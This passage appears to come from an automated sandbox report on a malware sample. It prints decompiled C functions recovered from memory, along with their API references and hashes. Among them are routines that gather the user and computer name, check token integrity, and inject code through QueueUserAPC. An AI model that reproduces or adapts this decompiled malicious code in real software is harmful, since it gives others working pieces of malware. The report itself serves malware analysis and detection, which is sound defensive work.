Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ecf31aeba43ed98005d813627b1c7d48568c4a426e59b4f5c7f61bf53997649b
Instruction ID: c697cf9a33fe1984f5baf551c519c4349eddc4eae9e38489c323e0d382f09996
Opcode Fuzzy Hash: ecf31aeba43ed98005d813627b1c7d48568c4a426e59b4f5c7f61bf53997649b
Instruction Fuzzy Hash: FF21D872610214FFEB21EBA4EC0AF9D77F9AB44760F158127F915E7180DB7195818760

Uniqueness

Uniqueness Score: -1.00%

Function 02F55220, Relevance: 10.8, APIs: 7, Instructions: 317COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 02F5525E
GetFileType.KERNEL32(?), ref: 02F554C7

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: FileInfoStartupType
String ID:
API String ID: 3016745765-0
Opcode ID: b2e787dc4f60eba686d0f1c35c4b88e5d13061e0781b4ab2c6126512f344936f
Instruction ID: 08fa56756603f78528d012e68b668d302a9e7078778873a93dba5f175e6feb1a
Opcode Fuzzy Hash: b2e787dc4f60eba686d0f1c35c4b88e5d13061e0781b4ab2c6126512f344936f
Instruction Fuzzy Hash: 84E12875E04258CFDB25CFA8C894BADFBB1BB49359F64825DDA25AB382C7309841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 032953F2, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E032953F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E032958F8();
				if(_t27 != 0) {
					_t77 =  *0x329a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x329a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x329a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0329696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x329a2d4; // 0x214d5a8
					_push(0x329a2fc);
					_push(1);
					_t7 = _t32 + 0x329b5ad; // 0x4d283a53
					 *0x329a2f8 = 0xc;
					 *0x329a300 = 0;
					L03294AF8();
					_t36 = E03296384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E03294454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E03296837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x329a2d4; // 0x214d5a8
								_t18 = _t64 + 0x329b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x329a32c = _t87;
						}
						_t38 = E032960E1();
						 *0x329a2c8 =  *0x329a2c8 ^ 0xe8fa7dd7;
						 *0x329a31c = _t38;
						_t39 = E03296837(0x60);
						__eflags = _t39;
						 *0x329a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x329a37c; // 0x53e9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x329a37c; // 0x53e9630
							 *_t56 = 0x329b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x329a290, _t84, 0x43);
							__eflags = _t42;
							 *0x329a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x329a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x329a2d4; // 0x214d5a8
								_t19 = _t76 + 0x329b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x32992a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E03294454( ~_v8 &  *0x329a2c8, 0x329a00c); // executed
								_t84 = E03292206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E03291376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E03292022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E03292439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x329a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E03296BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x032953f2
0x032953fd
0x03295400
0x03295403
0x03295406
0x0329540d
0x0329540f
0x0329541b
0x0329541d
0x0329541d
0x03295426
0x0329542e
0x03295431
0x0329544b
0x03295450
0x03295451
0x03295453
0x03295458
0x0329545d
0x0329545f
0x03295466
0x03295470
0x03295476
0x03295483
0x0329548a
0x0329548f
0x0329548f
0x03295498
0x032954c1
0x032954c4
0x032954d1
0x032954d8
0x032954e4
0x032954e6
0x032954e8
0x032954ed
0x032954f3
0x032954f9
0x032954ff
0x03295502
0x03295507
0x0329550f
0x03295511
0x03295511
0x03295514
0x03295514
0x0329551a
0x0329551f
0x03295527
0x0329552c
0x03295531
0x03295533
0x03295538
0x03295567
0x0329553a
0x0329553f
0x03295544
0x03295549
0x03295550
0x03295556
0x0329555b
0x03295561
0x03295561
0x03295568
0x0329556a
0x03295579
0x0329557f
0x03295581
0x03295586
0x032955b2
0x03295588
0x03295588
0x0329558e
0x0329559b
0x032955a1
0x032955a1
0x032955a9
0x032955ab
0x032955b3
0x032955b5
0x032955bc
0x032955c9
0x032955d3
0x032955d5
0x032955d7
0x00000000
0x00000000
0x032955d9
0x032955de
0x032955e0
0x032955e7
0x032955eb
0x032955ee
0x03295603
0x03295607
0x0329560c
0x00000000
0x0329560c
0x032955f0
0x032955f2
0x00000000
0x00000000
0x032955f4
0x032955fd
0x032955ff
0x03295601
0x00000000
0x00000000
0x00000000
0x03295601
0x032955e4
0x032955e4
0x032955b5
0x0329549a
0x0329549a
0x0329549f
0x0329560e
0x03295612
0x0329561a
0x0329561a
0x00000000
0x03295612
0x032954a5
0x032954a8
0x032954a8
0x032954aa
0x032954ad
0x032954b5
0x032954bc
0x00000000
0x03295622
0x03295622
0x03295625
0x0329562a
0x0329562a

APIs

Part of subcall function 032958F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0329540B,00000000,00000000,00000000,?,?,?,?,?,03296BD8,?,00000001), ref: 03295907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0329A2FC,00000000), ref: 03295476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,03296BD8,?,00000001), ref: 0329548F
wsprintfA.USER32 ref: 0329550F
memset.NTDLL ref: 0329553F
RtlInitializeCriticalSection.NTDLL(053E95F0), ref: 03295550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 03295579
wsprintfA.USER32 ref: 032955A9

Part of subcall function 03294454: GetUserNameW.ADVAPI32(00000000,032955CE), ref: 0329448B
Part of subcall function 03294454: RtlAllocateHeap.NTDLL(00000000,032955CE), ref: 032944A2
Part of subcall function 03294454: GetUserNameW.ADVAPI32(00000000,032955CE), ref: 032944AF
Part of subcall function 03294454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,032955CE,?,?,?,?,?,03296BD8,?,00000001), ref: 032944D0
Part of subcall function 03294454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 032944F7
Part of subcall function 03294454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0329450B
Part of subcall function 03294454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 03294518
Part of subcall function 03294454: HeapFree.KERNEL32(00000000,00000000), ref: 03294536

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: f93c260bc004dc76d5f6617f156439a77460b01777c2b716c13f520a2f8bddf2
Instruction ID: 6afb924c4a7a4ae62a4ce7fa62096ffc164ae5bce5b31affa3d89140c3e39a79
Opcode Fuzzy Hash: f93c260bc004dc76d5f6617f156439a77460b01777c2b716c13f520a2f8bddf2
Instruction Fuzzy Hash: 1751B471E20316ABFF12EB65E848BAEB3F8AF05710F294057E804EB144D7B4D9C18B90

Uniqueness

Uniqueness Score: -1.00%

Function 0329113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0329113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x329a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03296837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E032950CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0329114a
0x03291151
0x03291158
0x0329116c
0x03291177
0x0329118f
0x0329119c
0x0329119f
0x032911a4
0x032911af
0x032911b3
0x032911c2
0x032911c6
0x032911e2
0x032911e2
0x032911e6
0x032911e6
0x032911eb
0x032911ef
0x032911f5
0x032911f6
0x032911fd
0x03291203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0329116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0329118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0329119F
CloseHandle.KERNEL32(00000000), ref: 032911EF

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 032911C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 032911CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 032911DA

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 3d32e14a446e6e8a8e911ddd366dccedb9a1553c3e544ba6874d7fec2bbcb160
Instruction ID: 26fbf4c08de2a71525cd86958c6897643bce61547a541400a43891fc1b6b6f08
Opcode Fuzzy Hash: 3d32e14a446e6e8a8e911ddd366dccedb9a1553c3e544ba6874d7fec2bbcb160
Instruction Fuzzy Hash: 74216D7590020AFFEF01EF91DC48EAEBBB8FB09704F1440A6E510A6251D7719A54EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03296B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E03296B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x329a290 = _t14;
				if(_t14 != 0) {
					 *0x329a180 = GetTickCount();
					_t16 = E03294C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L03297EEA();
						_t40 = _t18 + _t20;
						_t22 = E0329414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x329a2ac; // 0x328
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x329a2b8 = 1; // executed
						}
					}
					_t16 = E032953F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x03296b0f
0x03296b24
0x03296b2c
0x03296b31
0x03296b44
0x03296b49
0x03296b50
0x03296bd8
0x03296bde
0x00000000
0x00000000
0x00000000
0x03296b56
0x03296b56
0x03296b5b
0x03296b61
0x03296b67
0x03296b71
0x03296b75
0x03296b76
0x03296b7b
0x03296b7c
0x03296b7d
0x03296b82
0x03296b88
0x03296b91
0x03296b97
0x03296b9d
0x03296ba2
0x03296ba9
0x03296bad
0x03296bb5
0x03296bbd
0x03296bbf
0x03296bbf
0x03296bc7
0x03296bc9
0x03296bc9
0x03296bc7
0x03296bd3
0x00000000
0x03296bd3
0x03296b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03296B24
GetTickCount.KERNEL32 ref: 03296B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 03296B5B
SwitchToThread.KERNEL32(?,00000001), ref: 03296B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 03296B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 03296B97
IsWow64Process.KERNEL32(00000328,?,?,00000001), ref: 03296BB5

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 4cf5e35632011b58af4fc28083f1db14402c94920935371fd590a8f81127caf4
Instruction ID: d7925d84c31a2ed749e9522b717ae2e607cdeea2a36d12a4708903e98632f03e
Opcode Fuzzy Hash: 4cf5e35632011b58af4fc28083f1db14402c94920935371fd590a8f81127caf4
Instruction Fuzzy Hash: F02105B1A10304AFEB10FF65E89DA2A77DCEB44330F00892FF519D6140E77188848B61

Uniqueness

Uniqueness Score: -1.00%

Function 02F11060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F11060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E02F11B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x2f141d0 + 0x2f15014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x2f141d0 + 0x2f150e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E02F1142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x2f141d0 + 0x2f150f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x2f141d0 + 0x2f15104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x2f141d0 + 0x2f15119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x2f141d0 + 0x2f1512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E02F11B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02f1106e
0x02f11072
0x02f11133
0x02f11078
0x02f11090
0x02f1109f
0x02f110a6
0x02f110aa
0x02f110ad
0x02f1112b
0x02f1112c
0x02f110af
0x02f110bc
0x02f110c0
0x02f110c3
0x00000000
0x02f110c5
0x02f110d2
0x02f110d6
0x02f110d9
0x00000000
0x02f110db
0x02f110e8
0x02f110ec
0x02f110ef
0x00000000
0x02f110f1
0x02f110fe
0x02f11102
0x02f11105
0x00000000
0x02f11107
0x02f1110d
0x02f11113
0x02f11118
0x02f1111f
0x02f11122
0x00000000
0x02f11124
0x02f11127
0x02f11127
0x02f11122
0x02f11105
0x02f110ef
0x02f110d9
0x02f110c3
0x02f110ad
0x02f11141

APIs

Part of subcall function 02F11B58: HeapAlloc.KERNEL32(00000000,?,02F11702,?,00000000,00000000,?,?,?,02F11CE6), ref: 02F11B64

GetModuleHandleA.KERNEL32(?,00000020), ref: 02F11084
GetProcAddress.KERNEL32(00000000,?), ref: 02F110A6
GetProcAddress.KERNEL32(00000000,?), ref: 02F110BC
GetProcAddress.KERNEL32(00000000,?), ref: 02F110D2
GetProcAddress.KERNEL32(00000000,?), ref: 02F110E8
GetProcAddress.KERNEL32(00000000,?), ref: 02F110FE

Part of subcall function 02F11B9C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 02F11BF9
Part of subcall function 02F11B9C: memset.NTDLL ref: 02F11C1B

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: cead364bbafda0181784c8670057e28853aa03307368525638ea51a638aa9145
Instruction ID: 1cabb89ad58c89af9f174c5dbeb952c02e3042f641d48acd613a40ec9cdf2012
Opcode Fuzzy Hash: cead364bbafda0181784c8670057e28853aa03307368525638ea51a638aa9145
Instruction Fuzzy Hash: 68212FB190060A9FEB11DF69EC84E5BB7FCFB447C8B924419EB09E7201E730E9118B60

Uniqueness

Uniqueness Score: -1.00%

Function 02F11DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x2f14188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x2f1418c;
						if( *0x2f1418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x2f14198;
								if( *0x2f14198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x2f1418c);
						}
						HeapDestroy( *0x2f14190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x2f14188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x2f14190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x2f141b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E02F113D1(E02F120CE, E02F1121C(_a12, 1, 0x2f14198, _t41));
							 *0x2f1418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x02f11db1
0x02f11dbd
0x02f11dbf
0x02f11dc2
0x02f11e38
0x02f11e3e
0x02f11e40
0x02f11e42
0x02f11e48
0x02f11e4a
0x02f11e4f
0x02f11e52
0x02f11e5d
0x02f11e5f
0x00000000
0x00000000
0x02f11e61
0x02f11e64
0x02f11e66
0x00000000
0x00000000
0x00000000
0x02f11e66
0x02f11e6e
0x02f11e6e
0x02f11e7a
0x02f11e7a
0x02f11dc4
0x02f11dc5
0x02f11de5
0x02f11deb
0x02f11ded
0x02f11df2
0x02f11e2e
0x02f11e2e
0x02f11df4
0x02f11dfc
0x02f11e03
0x02f11e0d
0x02f11e19
0x02f11e20
0x02f11e25
0x02f11e2a
0x00000000
0x02f11e2a
0x02f11e25
0x02f11df2
0x02f11dc5
0x02f11e87

APIs

InterlockedIncrement.KERNEL32(02F14188), ref: 02F11DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 02F11DE5

Part of subcall function 02F113D1: CreateThread.KERNEL32 ref: 02F113E8
Part of subcall function 02F113D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 02F113FD
Part of subcall function 02F113D1: GetLastError.KERNEL32(00000000), ref: 02F11408
Part of subcall function 02F113D1: TerminateThread.KERNEL32(00000000,00000000), ref: 02F11412
Part of subcall function 02F113D1: CloseHandle.KERNEL32(00000000), ref: 02F11419
Part of subcall function 02F113D1: SetLastError.KERNEL32(00000000), ref: 02F11422

InterlockedDecrement.KERNEL32(02F14188), ref: 02F11E38
SleepEx.KERNELBASE(00000064,00000001), ref: 02F11E52
CloseHandle.KERNEL32 ref: 02F11E6E
HeapDestroy.KERNEL32 ref: 02F11E7A

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 137504d8e771f42c33c695633e3adfa5cb4abf8f0133a24de86cfcc6fe622627
Instruction ID: b43e880af475e5149b9da27076311c4198a3b44112acbfa7863b375985de0ed5
Opcode Fuzzy Hash: 137504d8e771f42c33c695633e3adfa5cb4abf8f0133a24de86cfcc6fe622627
Instruction Fuzzy Hash: D0215471E40209ABEB119FEAEC44A5BBBA9E795BE87D20529F709F3140D7709910CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F113D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F113D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x2f141cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x02f113e8
0x02f113ee
0x02f113f2
0x02f113fd
0x02f11405
0x02f1140e
0x02f11412
0x02f11419
0x02f11420
0x02f11422
0x02f11428
0x02f11405
0x02f1142c

APIs

CreateThread.KERNEL32 ref: 02F113E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 02F113FD
GetLastError.KERNEL32(00000000), ref: 02F11408
TerminateThread.KERNEL32(00000000,00000000), ref: 02F11412
CloseHandle.KERNEL32(00000000), ref: 02F11419
SetLastError.KERNEL32(00000000), ref: 02F11422

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 1aa3f44e88ff547226811f3d1ca166278ec16e5a6a8110185d4166d01a6edd84
Instruction ID: 2102913b2d037ebb740d717568bd3f1512f97600f925cfa26bce33f8dc0dd639
Opcode Fuzzy Hash: 1aa3f44e88ff547226811f3d1ca166278ec16e5a6a8110185d4166d01a6edd84
Instruction Fuzzy Hash: 77F01236E85625BBD7229BA0AC0CF5BFFA9FB09FD9F824C44F70991150D72188209B91

Uniqueness

Uniqueness Score: -1.00%

Function 02F47A60, Relevance: 7.8, APIs: 5, Instructions: 327COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,00000718), ref: 02F47AC8
GetCurrentDirectoryA.KERNEL32(00000718,?,02F8300C), ref: 02F47BB6
delete.LIBCMTD ref: 02F47EB5
std::_Lockit::_Lockit.LIBCPMTD ref: 02F47ED4
std::_Lockit::~_Lockit.LIBCPMTD ref: 02F47EFF

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: DirectoryLockitstd::_$CurrentLockit::_Lockit::~_Systemdelete
String ID:
API String ID: 4219208524-0
Opcode ID: 9216205c8782683a5532003b25bf0b10bdb163b72ad26cd1c2179a6b10e5d691
Instruction ID: 6049a8bbf9b68caaa86cc1970c101faeac9004d546b23afa3bc5ea8a015644cc
Opcode Fuzzy Hash: 9216205c8782683a5532003b25bf0b10bdb163b72ad26cd1c2179a6b10e5d691
Instruction Fuzzy Hash: C5D17F71E44209CFC714DF24ED90A76FBA6F744F88B10896ED6068B364EB70A519CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02F118AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02F118AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
